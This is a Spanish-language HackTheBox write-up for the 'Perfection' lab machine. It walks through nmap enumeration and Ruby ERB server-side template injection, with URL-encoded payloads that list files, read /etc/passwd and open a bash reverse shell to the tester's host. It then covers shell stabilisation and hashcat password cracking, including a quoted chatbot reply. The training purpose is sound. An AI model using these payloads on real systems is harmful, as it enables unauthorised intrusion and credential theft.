🌐
My Pentest Book
  • πŸ’‘I changed my website
  • πŸ“„WriteUps
    • πŸ΄β€β˜ οΈHTB - HackTheBox
      • ⬛HTB - Advanced Labs
        • Endgames
          • P.O.O.
      • 🟨HTB - Runner
      • 🟩HTB - Usage
      • 🟩HTP - Active (Incomplete)
      • 🟨HTB - Scrambled
      • πŸŸ₯HTB - FormulaX (Incomplete)
      • πŸŸ₯HTB - Office
      • 🟩HTB - Perfection
      • 🟨HTB - WifineticTwo
      • 🟨HTB - Jab (Incomplete)
      • 🟩HTB - Buff
      • 🟨HTB - Hospital
      • 🟩HTB - Crafty
      • 🟩HTB - Bizness
      • 🟩HTB - Devvortex
      • 🟩HTB - CozyHosting
      • 🟩HTB - Analytics
      • 🟩HTB - Codify
      • 🟨HTB - Surveillance
      • 🟨HTB - Monitored
Con tecnologΓ­a de GitBook
En esta pΓ‘gina
  • InformaciΓ³n General
  • Enumeration
  • Ping para obtener ruta de retorno
  • Escaneo de puertos con Nmap
  • Escaneo detallado con Nmap
  • Modificando /etc/hosts
  • InspecciΓ³n con Burpsuite
  • Wappalyzer
  • Server Side Template Injection en Ruby

ΒΏTe fue ΓΊtil?

Editar en GitHub
  1. WriteUps
  2. HTB - HackTheBox

HTB - Perfection

https://app.hackthebox.com/machines/Perfection

AnteriorHTB - OfficeSiguienteHTB - WifineticTwo

Última actualización hace 1 año

ΒΏTe fue ΓΊtil?

InformaciΓ³n General

  • Nombre de la MΓ‘quina: Perfection

  • IP de la MΓ‘quina: 10.129.229.121

  • Sistema Operativo: Linux

  • Dificultad: Easy

  • Fecha de PublicaciΓ³n: 02 Mar 2024

Enumeration

Ping para obtener ruta de retorno

Realizamos un ping a la mΓ‘quina objetivo para verificar la conectividad y obtener informaciΓ³n sobre la ruta utilizando la opciΓ³n -R para incluir la ruta de retorno:

ping -c 1 10.129.229.121 -R

El valor de TTL (Time To Live) igual a 63 puede ser indicativo de que el sistema operativo de la mΓ‘quina objetivo es Linux. El TTL es un valor en el campo de los paquetes IP que indica la duraciΓ³n que un paquete puede estar en una red antes de ser descartado. Linux establece por defecto el valor de TTL de sus paquetes IP en 64, que al pasar por un salto en la red se decrementa a 63.

Escaneo de puertos con Nmap

Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la mΓ‘quina objetivo. Utilizamos las opciones -p- para escanear todos los puertos, --open para mostrar solo los puertos abiertos, -sS para un escaneo de tipo TCP SYN, --min-rate 5000 para establecer la velocidad mΓ­nima de paquetes y -vvv para un nivel de verbosidad alto. AdemΓ‘s, utilizamos -n para desactivar la resoluciΓ³n de DNS, -Pn para no realizar el escaneo de ping, y -oG allPorts para guardar la salida en un archivo con formato Greppable para luego utilizar nuestra funciΓ³n extractPorts:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.229.121 -oG allPorts
extractPorts allPorts

Escaneo detallado con Nmap

Posteriormente, realizamos un escaneo mΓ‘s detallado de los puertos identificados utilizando la opciΓ³n -sCV para detecciΓ³n de versiones y scripts de enumeraciΓ³n de servicios. EspecΓ­ficamente, indicamos los puertos a escanear con -p __PORTS__ (reemplazando __PORTS__ con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre targeted:

sudo nmap -sCV -p22,80 10.129.229.121 -oN targeted

Modificando /etc/hosts

Para aΓ±adir la entrada "10.129.229.121 perfection.htb" al archivo /etc/hosts, puedes usar el siguiente comando en la terminal:

echo "10.129.229.121 perfection.htb  " | sudo tee -a /etc/hosts

InspecciΓ³n con Burpsuite

Al inspeccionar la pagina nos encontramos con una calculadora de notas.

Por lo que primero ingreso valores para entender cΓ³mo funciona la herramienta. De paso lo hago con Burpsuite capturando el request y enviandolo al repeater.

Burpsuite 
POST /weighted-grade-calc HTTP/1.1

Host: perfection.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 196

Origin: http://perfection.htb

Connection: close

Referer: http://perfection.htb/weighted-grade

Upgrade-Insecure-Requests: 1



category1=ingles&grade1=10&weight1=10&category2=Matematica&grade2=10&weight2=20&category3=Lenguaje&grade3=10&weight3=10&category4=Ciencias&grade4=10&weight4=40&category5=Otros&grade5=10&weight5=20

TambiΓ©n podemos encontrar cierta "seguridad".

Wappalyzer

Entonces lo que quiero hacer es bypassear el filtro el cual arroja "Malicious input blocked". Para ello debo primero saber a quΓ© me estoy enfrentando, para eso existen herramientas como WhatWeb, Wappalyzer.

Server Side Template Injection en Ruby

ERB (Ruby)

  • {{7*7}} = {{7*7}}

  • ${7*7} = ${7*7}

  • <%= 7*7 %> = 49

  • <%= foobar %> = Error

Lo importante es andar jugando con el url enconde para que esta funcione, aquΓ­ podemos ver como nos retorna el valor 49. Esto quiere decir que es vulnerable.

category1=ingles%0A<%25%3d+`ls+la`+%25>&grade1=10&weight1=10&category2=Matematica&grade2=10&weight2=20&category3=Lenguaje&grade3=10&weight3=10&category4=Ciencias&grade4=10&weight4=40&category5=Otros&grade5=10&weight5=20
category1=ingles%0A<%25%3d+File.open('/etc/passwd').read+%25>

&grade1=10&weight1=10&category2=Matematica&grade2=10&weight2=20&category3=Lenguaje&grade3=10&weight3=10&category4=Ciencias&grade4=10&weight4=40&category5=Otros&grade5=10&weight5=20
category1=ingles%0A<%25%3d+`bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.54/6666+0>%261'`+%25>&grade1=10&weight1=10&category2=Matematica&grade2=10&weight2=20&category3=Lenguaje&grade3=10&weight3=10&category4=Ciencias&grade4=10&weight4=40&category5=Otros&grade5=10&weight5=20

Cogemos estabilidad en la shell:

script /dev/null -c /bin/bash
export TERM=xterm
stty raw -echo; fg

Y buscamos informacion interesante (.txt, .db, .sql, .dump).

find * -type f -name "*.db"

Identificamos el hash con hash-identifier

Entonces utilzo john y no hay buenos resultados.

john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Entonces subo LinEnum.sh a la mΓ‘quina para entender un poco mΓ‘s de ella y VoilΓ .

Quiere decir que nuestro usuario Susan tiene privilegios root, quiere decir que si logramos descifrar la clave ya estarΓ­amos listos. TambiΓ©n encuentro un archivo llamado "susan" en /var/mail/. El cual describe como estΓ‘ compuesta la contraseΓ±a:

Quiere decir que la clave serΓ­a algo como: susan_nasus_1234567890. AsΓ­ que lo que se me ocurre es preguntarle a chatGPT:

Y quΓ© creen, su respuesta fue de mucha ayuda:

Para crackear este hash con hashcat y la contraseΓ±a en formato "susan_nasus_XXXXXXXXXX", necesitas ajustar el modo de hashcat y especificar la mΓ‘scara para los nΓΊmeros X. Puedes hacerlo de la siguiente manera:

Primero, necesitas crear un archivo de texto llamado hashes.txt que contenga el hash que quieres crackear.

Luego, ejecuta hashcat con la siguiente sintaxis:

hashcat -m 1400 -a 3 hash.txt susan_nasus_?d?d?d?d?d?d?d?d?d?d
-m 1400 especifica el modo de hash para SHA256.
-a 3 especifica el modo de ataque de fuerza bruta.
susan_nasus_?d?d?d?d?d?d?d?d?d?d define la mΓ‘scara de la contraseΓ±a, donde ?d representa cualquier dΓ­gito.
Esto intentarΓ‘ crackear el hash utilizando la contraseΓ±a en el formato que especificaste. Por favor, ten en cuenta que el tiempo necesario para crackear la contraseΓ±a dependerΓ‘ de la complejidad de la misma y de la potencia de tu hardware.
hashcat -m 1400 -a 3 hash.txt 'susan_nasus_?d?d?d?d?d?d?d?d?d?d'

En mi caso puede tardar hasta 3 horas. AsΓ­ que a esperar el resultado. Luego accedemos como root y obtenemos la segunda flag.

AsΓ­ que lo que necesitamos es realizar una SSTI (Server Side Template Injection) en ruby. Que logre bypassear ese filtro. Para ello podemos hacer uso de HackTricks:

πŸ“„
πŸ΄β€β˜ οΈ
🟩
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby